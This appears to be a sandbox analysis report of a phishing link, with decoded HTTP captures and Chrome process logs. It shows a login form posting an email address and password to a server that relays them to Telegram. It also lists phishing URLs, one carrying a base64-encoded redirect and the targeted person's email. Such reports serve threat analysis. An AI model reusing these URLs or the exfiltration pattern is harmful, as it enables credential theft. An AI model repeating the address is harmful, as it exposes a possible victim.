                                    2025-01-23 07:06:08 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 69 63 6b 67 39 43 69 58 55 54 37 4e 4c 32 41 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 0d 0a 0d 0a 6d 61 72 63 6f 2e 63 65 72 75 6c 6c 6f 40 69 70 72 6f 74 65 78 2e 64 65 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 69 63 6b 67 39 43 69 58 55 54 37 4e 4c 32 41 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 70 77 64 22 0d 0a 0d 0a 78 2c 26 34 54 4b 37 74 50 32 5e 35 4b 5d 6c 23 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 69 63 6b 67 39
                                    Data Ascii: ------WebKitFormBoundaryickg9CiXUT7NL2AvContent-Disposition: form-data; name="email"marco.cerullo@iprotex.de------WebKitFormBoundaryickg9CiXUT7NL2AvContent-Disposition: form-data; name="userpwd"x,&4TK7tP2^5K]l#------WebKitFormBoundaryickg9
                                    2025-01-23 07:06:13 UTC204INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Thu, 23 Jan 2025 07:06:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Vary: Accept-Encoding
                                    2025-01-23 07:06:13 UTC104INData Raw: 35 64 0d 0a ef bb bf 7b 22 65 6d 61 69 6c 22 3a 22 45 6d 61 69 6c 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 74 65 6c 65 67 72 61 6d 22 3a 22 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 22 7d 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 5d{"email":"Email sent successfully.","telegram":"Form data sent to Telegram successfully!"}0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15192.168.2.65691440.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:06:31 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 71 59 57 78 37 48 30 56 55 61 37 57 72 35 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 62 64 65 30 32 36 34 37 37 33 39 65 39 62 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: TqYWx7H0VUa7Wr5N.1Context: d5bde02647739e9b
                                    2025-01-23 07:06:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:06:31 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 71 59 57 78 37 48 30 56 55 61 37 57 72 35 4e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 62 64 65 30 32 36 34 37 37 33 39 65 39 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TqYWx7H0VUa7Wr5N.2Context: d5bde02647739e9b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:06:31 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 71 59 57 78 37 48 30 56 55 61 37 57 72 35 4e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 35 62 64 65 30 32 36 34 37 37 33 39 65 39 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: TqYWx7H0VUa7Wr5N.3Context: d5bde02647739e9b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:06:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:06:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4e 79 75 55 70 36 78 6e 33 6b 61 74 2b 30 63 6f 72 6c 44 45 42 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: NyuUp6xn3kat+0corlDEBw.0Payload parsing failed.


                                    Statistics

                                    CPU Usage

                                    020406080s020406080100

                                    Click to jump to process

                                    Memory Usage

                                    020406080s0.0020406080100MB

                                    Click to jump to process

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:1
                                    Start time:02:05:20
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false
                                    Show Windows behavior

                                    File Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Memory Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Process Token Activities


                                    General

                                    Target ID:3
                                    Start time:02:05:22
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2184,i,7140382767829794373,7643732451792572459,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false
                                    Show Windows behavior

                                    File Activities

                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    Show Windows behavior

                                    Memory Activities


                                    General

                                    Target ID:4
                                    Start time:02:05:29
                                    Start date:23/01/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ug9n8.z1.web.core.windows.net/?lu=aHR0cHM6Ly9leHk3Ny5zMy5ldS1jZW50cmFsLTEuYW1hem9uYXdzLmNvbS9ubS5odG1sI21hcmNvLmNlcnVsbG9AaXByb3RleC5kZQ=="
                                    Imagebase:0x7ff684c40000
                                    File size:3'242'272 bytes
                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Disassembly

                                    No disassembly